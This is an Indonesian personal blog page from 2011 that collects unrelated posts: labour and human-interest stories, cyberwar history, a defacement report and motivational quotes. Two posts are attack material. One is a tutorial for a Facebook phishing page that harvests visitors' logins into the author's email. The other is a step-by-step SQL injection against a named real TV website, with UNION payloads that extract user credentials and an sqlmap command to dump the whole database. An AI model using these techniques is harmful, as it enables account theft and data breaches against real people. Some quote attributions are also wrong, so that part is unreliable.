Main Menu

Hellcome To my Blog site , visit my facebook:riyan facebook. بِسْــــــــــــــمِ اللهِ الرَّحْمَنِ الرَّحِيْـــــمِ
Giusto odio dignissimos Omnis dolor repellendus Olimpedit quo minus Itaque earum rerum

Sunday, September 25, 2011

Berita ini hampir sama hebohnya dengan berita postingan ane sebelumnya " Robot Pelacur Wanita Pertama Di Dunia " sehingga mengejutkan para pembacanya. Kali ini datang dari cina, sebuah pabrik yang sangat terkenal dan terbesar di dunia menambah melambungkan namanya dengan hadirnya berita ini, tapi kali ini berita buruk tentunya.
Cekidot beritanya :) ,,.

Lokasi : Pabrik YKE System Di Dongguan City. China.

Suhu ruangan pabrik yang luasnya hanya 35mx35m dan bisa di padati sampai 1000 buruh ini rata-rata sekitar 30 derajat celcius! Bayangkan dengan kebiasaan kita yang bekerja di ruangan ber-AC dengan suhu 25 derajat celcius. Kemungkinan besar ruangan kerja mereka juga di kasih AC tapi dengan jumlah pekerja yang begitu banyak, tentunya AC nya juga mesti banyak. Dan hal ini menyedot terlalu banyak listrik.


Mereka bekerja 6 sampai 7 hari seminggu dengan 15 jam shift per hari. Saking capeknya, kadang mereka cuma mau tidur saja setelah kerja. Kerja - tidur dan kerja - tidur setiap harinya seperti tidak ada kehidupan lagi buat mereka apalagi dengan gaji yang hanya ukuran UMR nya Indonesia, Rp.1jt/bulan dan ini berarti 1 jam nya mereka cuma dibayar sekitar Rp.3000/jam nya. Satu minggu kerja sekitar 80 jam, alias di paksa lembur tiap hari sampai kecapekan banget!


Banyak pekerja yang mengeluh karena mereka di perlakukan seperti budak, hidup untuk kerja, bukan kerja untuk hidup. Selain penderitaan ini, mereka juga kadang di lecehkan secara sexual oleh para staff pria.
Cewek-cewek pekerja buruh di Pabrik Microsoft yang harus bekerja dari jam 7.45 pagi sampai hampir jam 11 Malam setiap harinya.



Mereka di berikan asrama dengan kapasitas 14 orang per kamar nya. Yang lebih parahnya, mereka harus beli sendiri kasur karena pabrik hanya memberikan papan triplek untuk mereka tidur. Jadi kalo tidak beli kasur, cewek-cewek muda ini terpaksa tidur di atas papan triplek selebar 70cm. Pada saat mandi juga mereka hanya boleh membawa satu-dua ember air untuk membasuh badan nya (hemat air utk pabrik).


Untuk menghemat tempat, kadang ada 1000 buruh yang di padatkan di dalam ruangan yang hanya sebesar 35m x 35m dalam rumah asrama mereka.


Gaji para buruh wanita muda ini hanya Rp.1 juta per bulan nya dan mereka sering kali kecapekan sampai tidur di meja kerja pada waktu istirahat. Belum lagi makanan yang hanya sekedarnya, sudah capek di kasih waktu istirahat yang sangat minim dan makanan tidak bergizi. Memang malang juga nasib buruh wanita di China.

Microsoft mengatakan akan melakukan investigasi atas laporan foto ini. Komisi hak asazi manusia di China juga sudah berencana untuk melakukan investigasi atas pabrik-pabrik di China yang membuat barang-barang pesanan dari Microsoft.

Kalo memang benar ini berita ada,dan bisa di buktiin satu kata untuk microsoft, parah !!,, hehe :)
Continue Reading
Seluruh dunia kini sangat tergantung dengan komputer. Segala sistem kini telah terkomputerisasi, mulai dari perbankan, perdagangan, perbelanjaan, telekomunikasi, maupun informasi. Ini membuat kita di seluruh dunia sangat rentan terhadap serangan cyber. Lihat Stuxnet Virus Senjata Cyber War Sangat Berbahaya Virus Pemicu Perang Dunia Maya dan Daftar Hot Search Yahoo Indonesia Paling Banyak Dicari Yahoo Trends.

Oleh karenanya, perang cyber yang dipicu oleh tekanan dan penangkapan terhadap pendiri situs WikiLeaks cukup mengkhawatirkan. Pasalnya, para hacker pendukung WikiLeaks kemudian membidik perusahaan-perusahaan penyedia layanan keuangan seperti PayPal, Mastercard, dan Visa, sehingga transaksi keuangan dan perdagangan online melalui layanan-layanan tersebut bisa terganggu.

Berikut ini, daftar berbagai peristiwa perang cyber terbesar di duni ayang tercatat oleh sejarah, yang dicatat oleh situs Discovery.

1. Serangan Wor Stuxnet (2010).

Serangan worm Stuxnet banyak dipandang oleh para pakar sebagai salah satu serangan terbesar yang melibatkan kode program yang sangat kompleks.

Serangan worm ini memanfaatkan berbagai macam celah yang ada di sistem operasi Windows yang belum banyak diketahui, dan mengincar sistem industri yang mengendalikan berbagai perangkat mesin di instalasi pembangkt listrik maupun di pabrik-pabrik.

Reaktor nuklir Bushehr IranTak salah bila banyak yang curiga bahwa worm ini didalangi oleh pihak yang besar, bahkan disponsori oleh negara besar, dalalam hal ini adalah negara barat.

"Level serangan seperti ini hanya bisa dilakukan oleh pemerintahan sebuah negara, atau sebuah entitas yang didukung oleh pendanaan luar biasa," kata Paul Royal, pakar TI dari Georgia Institute of Technology.

Iran menjadi negara yang paling banyak tertular oleh worm ini, dan banyak yang curiga, pihak barat sengaja ingin melumpuhkan pembangkit nuklir Bushehr dengan worm ini.

2. Operasi Aurora (2009).

Pada 2009, sekitar 30 perusahaan besar termasuk Google dan Adobe Systems, dikabarkan benajdi korban serangan cyber yang sangat rumit. Para hacker berhasil mencuri properti intelektual dari perusahaan-perusahaan tadi dengan memanfaatkan celah keamanan pada browser Internet Explorer.

Vice President of Threat Research McAfee, Dmitri Alperovitch mengatakan bahwa ia menemukan kata 'Aurora' pada direktori file di komputer penyerang, saat melakukan pelacakan dari komputer yang telah terinfeksi. Dipercaya, hacker menamakan Aurora sebagai nama operasi ini.

Peresmian laman Google di China pada April 2006

"Pada kasus Aurora ini, mereka tidak menginginkan uang. Mereka mengincar repositori sistem proprietari dan properti intelektual yang dimiliki oleh perusahaan-perusahaan serta kode sumber sistem yang merupakan hal yang terpenting dimiliki oleh perusahaan-perusahaan ini," kata Alperovitch.

Tak cuma orang-orang yang bekerja pada perusahaan multinasional yang harus berhati-hati dengan upaya intrusi ini, namun beberapa tokoh oposisi China juga diincar. Dari dokumen yang dibocorkan oleh Wikileaks, serangan ini diinstruksikan oleh seorang petinggi di pemerintahan China.

3. Sentral Komando AS (2008)

Pencurian data informasi pribadi di komputer/notebookPada 2008 Departemen Pertahanan AS, mendapat serangan. Sumbernya: sebuah USB flash drive yang tidak berwenang yang diselipkan ke salah satu laptop di sebuah markas militer AS di Timur Tengah.

Flash disk tersebut mengandung kode berbahaya yang dikembangkan oleh intelijen asing dan menyebar melalui sistem komputer Departemen Pertahanan AS dan menyebabkan data dikirim ke server asing.

Serangan militer lainnya yang dilakukan melalui media portabel adalah peristiwa penyalinan 250 ribu data memo diplomatik AS dan video serangan heli Apache pasukan AS terhadap sekelompok sipil oleh Prajurit Satu Bradley Manning ke dalam CD Lady Gaga dari salah satu markas militer AS di Irak.

4. Georgia (2008)

Pada 2008 Rusia dan Georgia terlibat konflik di Ossetia Selatan. Serangan cyber melumpuhkan beberapa situs pemerintah Georgia dan situs-situs media lokal, setelah Georgia menyerang Ossetia Selatan. Ini merupakan serangan yang mirip dengan serangan ke Estonia pada 2007.

Serangan terhadap Georgia juga dilakukan menggunakan metoda Distributed Denial of Service. Siapapun dalang serangan ini sepertinya telah mengembangkan botnet, di mana masyarakat bisa mengunduhnya untuk membantu serangan terhadap situs-situs Georgia.


5. Estonia (2007)

Estonia menghadapi gelombang serangan cyber yang melanda segenap infrastruktur internet negara itu, mulai dari situs-situs pemerintahan, perbankan, hingga situs-situs surat kabar lokalnya.

Serangan ini terjadi bersamaan dengan perseteruan antara Estonia dan Rusia terkait dengan rencana pemindahan makam Tallinn oleh pemerintahan Estonia. Para analis media menyebut konflik ini sebagai perang cyber pertama. Namun, pihak Rusia sendiri membantah bahwa serangan-serangan terhadap Estonia dilancarkan oleh pemerintah Rusia. vivanews.com
Continue Reading

Saturday, September 24, 2011



Satu lagi sebuah kisah yang sangat mengharukan dari Negeri Tirai Bambu, seorang anak kecil di Dajiyuan, menghidupi ayahnya yang lumpuh dengan menjadi seorang pemulung. Karena ayahnya lumpuh bertahun-tahun, anak yang baru berumur 6 tahun ini terpaksa memikul tanggung jawab rumah tangga. Selain setiap hari mencuci muka ayahnya, memijat dan memberi makan, dia masih bersama ibunya mengambil botol air mineral bekas sebagai tambahan pendapatan keluarga. Cerita Tse Tse ini banyak menyentuh hati teman di internet, hanya beberapa jam, sudah puluhan ribu orang yang mengkliknya.

Adegan yang mengharukan

Begitu sampai di rumah, Tse Tse langsung sibuk menyiapkan seember air, lantas dengan tangannya yang mungil ia memeras selembar handuk yang besar, karena handuk terlalu besar buat dia, Tse Tse membutuhkan 3 sampai 4 menit baru bisa mengeringkannya, kemudian dengan handuk itu dia menyeka wajah ayahnya dengan lap itu. Dia sangat teliti melapnya, sepertinya khawatir kurang bersih. Setelah selesai, Tse Tse kemudian berjingkat melap punggung ayahnya, di belakang, selesai semua, dengan puas dia tersenyum ke ayahnya.

Tse Tse tahun ini berumur 6 tahun, baru kelas 1 SD, tinggal di jalan Baoan, desa Nantong, papanya Xiong Chun pada 5 tahun lalu tiba-tiba menderita otot menyusut, di bawah leher semua lumpuh, untuk mengobati penyakitnya dia telah menghabiskan semua tabungannya. Sekarang, keluarga yang beranggotakan 3 orang ini hanya mengandalkan ibunya yang bekerja di pabrik, dengan penghasilan kecil itulah mereka bertahan hidup.

Di sekolah Houde, anak yang seumur dengannya dengan ceria bergandeng tangan dengan orang tuanya sambil berjalan, namun Tse Tse malah harus sekuat tenaga mendorong ayahnya pulang. Ketika mau menyeberang jalan, dia akan berhenti sejenak, menoleh kendaraan yang lalu lalang, setelah aman dia baru menyeberang. Setiap ketemu tempat yang tidak rata, Tse Tse harus mengeluarkan tenaga ekstra menaikkan roda depan, menarik kursi roda itu dari belakang, wajahnya yang mungil sampai terlihat kemerahan. Dari sekolah sampai rumah jaraknya sekitar 1.500 meter, harus ditempuh selama 20 menit.

Satu keluarga 3 orang menempati rumah 8 m2

Rumah Tse Tse adalah sebuah rumah dengan kamar kecil seukuran 8m2, hanya besi seng menutupi atap yang menghalangi cahaya masuk ke kamar, di atap tergantung sebuah lampu energi kecil. Dalam rumah penuh debu, yang paling mencolok adalah penghargaan Tse Tse yang tergantung di dinding. Terhadap sekeluarga yang pendapatan bulanannya hanya sekitar 1.000 RMB (Rp. 1,5 juta) bisa dikatakan, sebuah TV 21″ sudah merupakan barang mewah.



Sebuah ranjang atas dan bawah sudah memenuhi seluruh kamar, di atasnya penuh dengan barang pecah belah, hanya tersisa sedikit ruang kecil. Xiong Chun berkata, itu adalah ranjang Tse Tse. Sebuah meja lipat tergantung di dinding, itu adalah meja belajar Tse Tse, juga adalah meja makan keluarga.

Di samping pintu yang luasnya tidak sampai 1 m2, ada "dapur" yang dibuatnya sendiri, di samping kompor masih tersisa sebatang kubis. "Makanan dan minyak di rumah semua diberikan oleh teman mamanya, satu hari tiga kali makan, Cuma makan malam yang agak lumayan, di rumah jarang makan daging, namun setiap minggu mereka akan mengeluarkan sedikit biaya untuk mengubah kehidupan anaknya, namun setiap kali makan, Tse Tse akan membiarkan saya makan dulu, baru dia makan." Kata Xiong Chun.

Setiap hari memijat papanya 3 kali

Mama Tse Tse bekerja di pabrik, setiap siang hari dia akan menyisakan sedikit waktu pulang ke rumah menanak nasi untuk suaminya, setelah menyuapi dia segera balik ke pabrik bekerja, tanggung jawab merawat suaminya semua di bebankan ke pundak Tse Tse.

Xiong Chun memberitahu wartawan, setiap pagi jam 6.30 begitu jam alarm berbunyi, Tse Tse akan bangun, cuci muka dan sikat gigi, dia juga membantu papanya mencuci muka, selesai itu dia akan memijat tangan dan kaki papanya, kira-kira 10 menit. Pulang sekolah sore, dia akan memijat papanya lagi, malam setelah memandikan papanya, dia akan memijat papanya lagi, baru tidur.

"Agar bisa lebih banyak membantu mamanya, Tse Tse kadang-kadang ikut mamanya memungut barang bekas untuk menambah penghasilan keluarga. "Xiong Chun sangat sayang anaknya. Tetangga di sekeliling sangat terharu dan mengatakan: "Tse Tse sangat mengerti. Kita semua merasa bangga ada anak seperti ini."
Boneka 5 Yuan yang paling disukainya

Mama membawa dia memungut botol air bekas untuk menambah penghasilan. Suatu ketika, Tse Tse memungut satu mainan mobil plastik bekas di tempat sampah, dia bagaikan mendapat barang pusaka, setiap hari akan main sebentar dengan mobil plastiknya itu. Yang Xianfui berkata, kemarin mama dan anak pergi memungut besi bekas, bisa dijual 20 Yuan.



Tse Tse punya satu boneka kecil yang lucu, itu yang paling disayanginya. Malam hari juga mengendongnya tidur. "Dia melihat boneka itu di toko, beberapa kali dia memintanya, 5 Yuan, saya tidak tega terus, akhirnya saya nekat membelikannya," Kata Xiong Chun.

Begitu Tidak Boleh Sekolah, Langsung Menangis

Untuk mengirit biaya listrik,setiap hari begitu pulang sekolah Tse Tse akan memindahkan "Meja kecilnya" keluar, mengejar siang hari menyelesaikan PR-nya. "Uang sekolahnya setahun sekitar 3.000 sampai 4.000, kami tidak sanggup. Karena tidak ada uang, tahun ini saya juga melepaskan berobat lagi," kata Xiong Chun. Beberapa waktu yang lalu, dia berbicara dengan istrinya agar Tse Tse berhenti sekolah saja, Tse Tse begitu tahu langsung menangis.
Continue Reading

Friday, September 23, 2011

Tata cara nya sebagai berikut:

1. Download scriptnya dulu
http://www.mediafire.com/?448qgmyux5o2mb8 atau http://idws.us/jjfjdc
2. Cari
server gratisan atau injekkan yang support .PHP ( tanya om Google ) atau .ASP ( http://www.jabry.net )
3. Facebook tentunya
Mulai pembuatannya deh :
Sudah disiapkan scriptnya?? kalau sudah, ubahlah di bagian yang saya tandai menjadi alamat e-mail anda

.PHP  Code:



.ASP Code:

lalu upload ke server anda..dan tugas pertama kita selesai. :)

Lalu masuk ke http://www.facebook.com/pages/create dan pilih "Perjuangan atau Komunitas" lalu masukkan nama halaman anda.
Disini dituntut kepandaian kita mengolah kata agar berkesan menarik. Contoh "Cek Kepopuleran FB Anda" dan selesaikan langkah yang di anjurkan.
Kalau udah punya Logo buat halaman kita lebih bagus lagi sekalian kita upload disana. Kalau udah di kolom "Alamat Web" kita isi
http://www.facebook.com/ lalu selesai deh.
Saatnya kita masuk ke
http://www.facebook.com/add.php?api_key=...1e44&pages dan kita pilih "aplikasi" lalu kita pilih "Go To Apps" dan masukkan kode FBML yang sudah didownload tadi.
Jangan lupa di bagian yang bertuliskan "http://yourwebsite.com/facebook.php" diganti Url tempat kita mengupload file Facebook.php tadi...dan klik "Save". selesai sudah tugas ke 2 kita. Lihat gambar dibawah ini




Dan hasilnya akan terekam dengan baik di e-mail yang udah kita setting tadi...he he he

[Image: sshot5e.jpg]
Courtesy Of j0ck3rReferensi : The Hacker News
Continue Reading
It was interesting observing the flurry of Facebook integration announcements in the past 24 hours, especially regarding music services. Back in the day, I had helped convince then-Apple employee Dave Morin to join Facebook to build what became the Facebook Platform, and had hacked together one of the first music applications, Audio, on the then-day-old platform.
I never really talked about what happened to Audio; however, in seeing that so many businesses and people seem hell-bent on integrating ever-further with Facebook, I figured I'd provide a cautionary tale.
At the time of my creation of Audio, it turned out that Facebook had already cut some sort of deal to help iLike -- thus, in some strange way completely unknown to me, I was operating outside of the "plan." While Dave Morin worked quietly and bravely to defend me against the moves of iLike and Facebook executives to shut down Audio, he eventually found himself as a casualty in a greater power play quietly orchestrated by Sean Parker and Mark Zuckerberg, in which he was demoted and replaced by Chamath Palihapitiya. Chamath had been previously known to me from my friends at Winamp as "the guy who fucked Winamp," (after Winamp had been sold to AOL) and seemed like a pretty lame dude. Turns out that he had cut a backroom deal with Sean Parker to enable easy exporting of social graphs from AOL/AIM into Facebook -- and in return, as soon as the Platform appeared to be successful, Dave Morin was ousted from his job and Chamath was hired with $90 million in Facebook stock.
As soon as Chamath took over from Morin, I immediately started to hear more and more about how the record labels were about to shut down Audio due to copyright demands. In fact, Chamath would call and email my business partner and I on a regular basis to tell us that the app was about to be shut down -- and every time he did, I would have to frantically stave him off, telling him about how we were cutting deals with the labels to bring them on board and get licenses. What I didn't realize at the time, however, is that it was this very assurance of label support that was actually screwing me over with Facebook, as Chamath was basically just trying to shut down Audio to help his friends at iLike. Once he got word that we were in the final stages of a major round of funding from Universal Music and two of the other big four labels, he immediately shut down the app and thus killed the whole business. The funny thing about the final phone call from Chamath was that he claimed that Universal Music's general counsel had sent him a notice saying they would sue Facebook if they didn't shut down Audio -- but when he called me, I was sitting in Jimmy Iovine's office; Jimmy personally called the GC of Universal who told him the entire story was complete bullshit.
(Many of Audio's old users wondered why I never updated the app or fixed many of their complaints -- now you know what I was dealing with!)
I remember having a call with Sean Parker, who I then considered to be a friend, explaining my problems with Audio before its collapse. "It will never work," he said to me. "You'll see what I mean." I would have never thought that Parker would have been pulling such crazy shit on me at the time, but hey -- you live and you learn.
If you are entrusting your life data to Facebook, or if you are depending on Facebook and its platform for your livelihood, beware. In the real Facebook world, there is no trust, and there is no friendship -- there is only money and power. Think really hard -- really, think -- before trusting Facebook or its employees with anything. Don't be a Facebook fool.
Continue Reading
Jakarta, CyberNews. Pengamat TI Onno W Purbo mengemukakan ada puluhan ribu peretas dunia maya di Indonesia. "Indonesia memiliki 65 ribu peretas dan basis terbesar di Yogyakarta, peretas di Jogja lebih aktif dan kreatif," kata dia di Jakarta, Kamis (22/9).
Onno W Purbo mengemukakan hal itu ketika menghadiri acara peluncuran Norton Internet Security dan Norton Anti Virus 2012. Menurut kajiannya, peretas akan terus berkembang. Perguruan tinggi, menurutnya, adalah "kawah candradimuka" untuk belajar dan membuat virus.
"Peretas di Jogja meluncurkan suatu aplikasi seputar peretasan yang bernama X-Code dan bisa diunduh gratis di Internet," katanya.
Karya peretas misalnya adalah virus lokal yang mampu memformat hard drive tanpa seijin pemilik perangkat komputer, mencuri data kartu kredit. Virus yang ia contohkan itu juga mampu membobol akun jejering sosial pemilik komputer, seperti Facebook dengan menjebol akun emailnya terlebih dahulu.
Yang hebat dari seorang peretas, kata Ono, bukan saja mampu membuat virus dan mengambil data seseorang untuk kepentingan pribadi, tapi juga membuat sistem keamanan yang kuat supaya tidak bisa ditembus oleh para peretas lainnya.
Kriteria menjadi peretas yang hebat, haruslah orang tersebut benar-benar suka komputer, katanya. "Istilahnya computer geek. Kata siapa gampang? Dia bisa nggak tidur tujuh hari tujuh malam melototin komputer," katanya berkelakar.
( Ant / CN33 )
Continue Reading

Thursday, September 22, 2011


Screenshot Situs Kominfo yang Disusupi (Ist.)
Jakarta - Entah karena ingin mengekspresikan kekecewaan terhadap pemerintah atau karena sebab lain, akhir-akhir ini hacker membidik sasarannya ke situs-situs lembaga pemerintahan. Setelah situs Polri, Lemhanas, dan Pertamina, situs Kementerian Komunikasi dan Informatika (Kominfo) ikut disusupi. Sialnya, ini bukan yang pertama kali.

Situs yang beralamat di www.depkominfo.go.id itu, saat dikunjungi detikINET, Selasa (31/5/2011) tidak bisa diakses seperti biasa. Namun sebelumnya, detikINET sempat menemukan halaman khusus yang dibuat para peretas itu.

[+] HACKER MANIFESTO [+]

[+] This is our world now...!!! [+]
[+] the world of the electron and the switch, the beauty of the baud. [+]
[+] We make use of a service already existing without paying for what could be dirt-cheap [+]
[+] if it wasn't run by profiteering gluttons, [+]
[+] and you call us criminals...!!! [+]

[+] We explore... [+]
[+] and you call us criminals...!!! [+]
[+] We seek after knowledge... [+]
[+] and you call us criminals...!!! [+]
[+] We exist without skin color, without nationality, without religious bias... [+]
[+] and you call us criminals...!!! [+]
[+] You build atomic bombs, you wage wars, you murder, cheat, and lie to us [+]
[+] and try to make us believe it's for our own good, [+]
[+] yet we're the criminals...!!! [+]

[+] Yes, I am a criminal...!!! [+]
[+] My crime is that of curiosity...!!! [+]
[+] My crime is that of judging people by what they say and think, [+]
[+] not what they look like...!!! [+]
[+] My crime is that of outsmarting you, [+]
[+] something that you will never forgive me for...!!! [+]

[+] I am a hacker, and this is my manifesto. [+]
[+] You may stop me, but you can't stop us all....!!! [+]

demikian cuplikan pesan yang dituliskan hacker di halaman tersebut.

Dalam satu bulan, situs Kominfo mengalami dua kali kebobolan. Yang pertama pada 23 Mei silam. Kelompok hacker yang menamakan diri YOGYACARDERLINK tak hanya menampilkan halaman berisi protes terhadap kinerja Kominfo, tetapi juga mengklaim telah mendapatkan akses root dari situs Kominfo. Ini berarti, pelaku bisa dengan mudah menghapus semua data di server atau menjadikannya sebagai komputer 'zombie'.
Continue Reading
Mohon maaf sebelumnya, saya sudah mencoba menghubungi pihak technical dari globaltv tapi belum ada respon, saya tidak bermaksud untuk merusak apalai pamer skill(saya tidak bisa apa-apa, hanya seorang script kiddies), Bug ini ditemukan oleh seorang member devilzc0de.org, saya lupa nicknya, kemudian saya tertarik untuk mencoba melakukan penetrasi ke situs http://www.globaltv.co.id
situs ini terkena SQL injection pada banyak bagian (Error Based), situs ini menggunakan framework Codeigniter versi x (tidak tau), sama halnya seperti bug sql injection yang terjadi pada situs telkomsel yang pernah saya publish sebelumnya, Jika sebuah situs menggunakan framework Codeigniter, sedikit sulit untuk melakukan exploitasi melalui URL, karena Codeiginiter di lengkapi dengan filter-filter yang cukup tangguh untuk menghalangi jenis serangan ini, tetapi mungkin sang creator kelupaan untuk menggunakan fitur-fitur tersebut
Dari sekian banyak bug yang ada (sqli), saya memilih menggunakan bagian pencarian, karena metode dari pencarian menggunakan method POST bukan GET atau melalui form bukan di bawa melalui URL, dengan begitu filterisasi wildcard di URL bisa di bypass karena variable di bawa melalui form
Seperti biasa, untuk mnguji SQL injection bug , saya menggunakan singel quota (') atau %27 dalam url encode, ternyata globaltv(form search) menampilkan query error yang sangat rentan (informasi error based), karena jenis bug sqli merupakan error based saya mencoba menggunakan metode UNION based

a%') and 1=1#
a%') and 1=0#
Sql yang terjadi secara kasar pada proses pencarian di globaltv menggunakan operator like '%$keyword'% jadi mungkin sederhanya seperti berikut

Select from bla where keyword like '%$keyword%' AND .....
Jika kita menginjectnya menggunakan metode POST, kita memberikan SQL injection di bagian form search, dan berusaha membyapass bagian akhir dari perintah query, jika perintah query seperti sebelumnya, maka kita menjadikan query seperti berikut

Select from bla where keyword like '%a%') and 1=0#%' AND .....
Dengan begitu perintah SQL di belakang tanda # tidak akan di proses, kemudian kita melakukan order by untuk mencari jumlah kolom yang bisa kita inject, dengan menggunkan perintah order by di ikuti oleh jumlah kolom yang akan kita proses hingga kita mendapatkan kondisi TRUE (tidak error), seperti berikut

a%') and 1=0 order by 20# -> FALSE
a%') and 1=0 order by 19# -> TRUE
Dengan demikian kita tau bahwa jumlah kolom yang bisa kita inject berada di antara 1 - 19, kemudian kita memberikan perintah UNION SELECT untuk mencari kolom mana yang bisa kita inject, dengan perintah UNION SELECT akan menghasilkan sebuah angka (nomor kolom) yang bisa kita sisipi dengan perintah sql lainnya (multiple SQL Statment), seperti berikut

a%') and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
Dan Hasilnya Seperti berikut

Setelah kita menemukan Nomor kolom yang bisa di inject langkah selanjutnya adalah mencari tau informasi global, seperti username server, nama current database, dan versi dari mysql database, dengan memberikan perintah berikut

a%') and 1=0 union select 1,version(),3,database(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
Dan Hasilnya

Setelah mendapatkan informasi global seperti user(), version(), dan database(), langkah selanjutnya yaitu mencari nama-nama tabel yang ada dalam database tersebut, selain perintah user(), version(), dan database() masih banyak lagi perintah yang bisa kita gunakana untuk mencari tau informasi tentang server target

a%') and 1=0 union select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.tables where table_schema=database()#
Dengan memberikan perintah tersebut akan mengeluarkan semua tabel yang ada dalam database server, group_concat merupakan sebuah fungsi (sintak) dalam mysql agar hasilnya dalam bentuk group (mungkin :D), selain group_concat bisa menggunakan concat_ws atau yang laiinya, berikut hasil dari code di atas

Setelah memperhatikan nama-nama tabel di atas, ada 3 buah tabel yang menurut saya paling kritik, seperti member, users dan tbl_user, untuk itu saya memilih tbl_user, karena tabel itu kemungkinan menyimpan username dan password sang admin, untuk membaca isi dari tabel user terlebih dahulu kita harus mencari tau nama field (kolom) yang ada dalam tbl_user tersebut,dengan menggunakan perintah

a%') and 1=0 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where table_name=unhex(hex(tbl_user))#
Perintah tersebut akan menghasilkan nama-nama field(kolom) yang ada dalam tbl_suer, seperti berikut

Setelah mendapatkan nama-nama kolomnya, kini kita mencari tau isi dari kolom-kolom tersebut, pasti isinya menampilkan username dan password :D, dengan menggunakan perintah berikut

a%') and 1=0 union select 1,2,3,group_concat(username,0x3a,useremail,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from tbl_user#
Fungsi dari 0x3a merupakan bentuk hexa dari titik dua (:) maksudnya untuk membedakan tiap-tiap data yang muncul, hasilnya seperti berikut

Untuk mencoba selain tbl_user, saya mencoba tabel dengan nama users, karena menurut saya ini juga sangat riskan, caranya sama seperti di atas, menggunakan perintah yang sama, hanya saja nama tabel yang diganti menjadi users, seperti berikut

a%') and 1=0 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where table_name=unhex(hex(users))#
berikut screen shoot tampilan hasil dari scirp tersebut untuk tabel users

dan untuk membaca isi tabel tersebut kita harus mencari tau nama-nama fieldnya (kolom), dengan perintah yang juga sama dengan perintah sebelumnya

a%') and 1=0 union select 1,2,3,group_concat(user_username,0x3a,user_email,0x3a,user_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from users#
Dan berikut hasilnya

Dengan cara di atas pun sudah cukup berbahaya bukan ? kita bisa membaca data yang sangat rahasia sifatnya (username, email, password) bahkan banyak email dan no telpon dari petugas, pelamar kerja dan lain sebagainya dalam situs globaltv tersebut, biasanya attacker tidak akan berhenti sampai disini (maaf saya tidak bisa memberitaukan halaman login admin :D), tetapi saya akan memberitaukan bagaimana mengambil semua isi database dari server globaltv.co.id (ini ilegal, jadi harap jangan di tiru)
Untuk meng-dump (meng-export) semua isi database server, bisa dengan cara manual, tetapi juga bisa dengan cara otomatis(dengan tools), jika kita menggunakan manual tentu saja sedikti repot karena banyaknya tabel dan kolom yang harus kita cari terlebih dahulu, tetapi dengan menggunakan SQLmap kita bisa melakukanny hanya dengan beberapa baris perintah, seperti berikut perintah sqlmap pada console

python sqlmap.py -f -b --current-db --current-user --password --dbs --tables --dump-all --data "keyword='" -u http://www.globaltv.co.id/search -v 0
Dengan perintah tersebut sqlmap akan melakukan semua untuk kita, dan akan meng-extract seluruh isi database, jika database lebih dari satu makan tidak terkecuali, semua database akan di extract, berikut hasil dari penggunaan tools sqlmap pada globaltv.co.id

Saya juga mendokumentasikan aksi ujicoba penetrasi ini dalam bentuk video, nanti akan saya upload ke youtube sebagai media pembelajaarn terhadap aksi nyata (bukan merusak)
Ini videonya, silahkan di download Nonton / Download video
Saya mempublish ini bertujuan untuk pembelajaran semata, bukan untuk merusak apalagi apmer skill, sekali lagi saya mohon maaf untuk pihak globaltv.co.id, pesan saya silahkan perbaiki security website anda, saya tidak melakukan pengrusakan apalagi menyebarkan informasi member yang ada pada situs anda
Thanks for Reading

source :http://khairu.net/index.php/page/artikel/23/SQL_injection_di_globaltv.co.id__Exsposed
Continue Reading

Wednesday, September 7, 2011

Mimpi yang bernilai tinggi otomatis membutuhkan pengorbanan dan kerja yang tinggi pula.
Anggraini Lubis.

Aplikasi atau tindakanlah yang membuat orang  sukses,
tentu saja setelah mimpi yang tinggi dan ilmu yang mencukupi.
Anonim
Mimpi memang sangat perlu untuk memelihara gairah hidup dan kemajuan,
tetapi mimpi tanpa disertai tindakan hanyalah seperti pepesan kosong belaka.
Anonim
Everyone says good things from the heart;
nobody dares say good things from the mind.
Semua orang mengatakan hal-hal baik dari hati.
Namun tidak ada seseorang berani mengungkapkan kebenaran dari pikirannya.
Francois De La Rochefoucauld (1613-1680)
French Classical Writer
Seseorang yang punya alasan untuk hidup pasti mampu menyelesaikan hampir semua persoalan.
-Friedrich Nietasche-
Kepuasan terletak pada usaha bukan pada hasil. Berusaha dengan keras adalah kemenangan yang hakiki.
(Mahatma Gandhi)
Teman Sejati adalah ia yang meraih tangan anda dan menyentuh hati anda.
(Heather Pryor)
Yang penting bukan berapa lama kita hidup, tetapi bagaimana kita hidup.
Anonim
"Harta sejati adalah kesehatan, bukan emas dan perak." Mahatma Gandhi (1869-1948), Pemimpin Besar India
Begitulah cinta, ketika ia terurai jadi perbuatan. Ukuran integritas cinta adalah ketika ia bersemi dalam hati... terkembang dalam kata... terurai dalam perbuatan...
"Elemen terpenting kita bukan pada otak. Namun, pada apa yang menuntun otak kita--kepribadian, hati, kebaikan, dan ide-ide progresif." Fyodor Dostoyevsky (1821-1881)
"Sekuntum mawar akan menjadi kebunku. Seorang sahabat sejati akan menjadi duniaku." Leo Buscaglia (1924-1998), Sastrawan AS
Hadapilah setiap tantangan yang menghadang dengan lapang dada, seakan Anda telah tersentuh gairah kemenangan." George S Patton (1885-1945) Jenderal AS di Perang Dunia I dan II
"Hampir semua pria memang mampu bertahan menghadapi kesulitan. Namun, jika Anda ingin menguji karakter sejati pria, beri dia kekuasaan."
Abraham Lincoln (1809-1865), Presiden AS ke-19
"Mencintai artinya berbagi kebahagiaan demi kebahagiaan orang yang kita cintai." GW Von Leibnitz, Matematikawan-Penemu Kalkulus
"Suatu nasihat dinilai dari hasil, bukan dari niat." Cicero, Filsuf-Negarawan Masa Romawi
"Kita tidak bisa mengubah masa lalu. Kita tak bisa mengubah sesuatu yang tak bisa dihindari. Satu hal yang bisa kita lakukan adalah berpegang pada tali yang kita punya. Dan itu adalah perilaku yang benar." Charles R Swindoll, Penulis AS
"Jangan pernah menyesal setelah Anda mengungkapkan suatu perasaan. Karena jika demikian, Anda sama saja menyesali kebenaran." Benjamin Disraeli, Mantan PM Inggris-Novelis
"Di tiap jengkal kehidupan, sang hujan memang harus tercurahkan.
"Mereka yang berjiwa lemah tak akan mampu memberi seuntai maaf tulus.
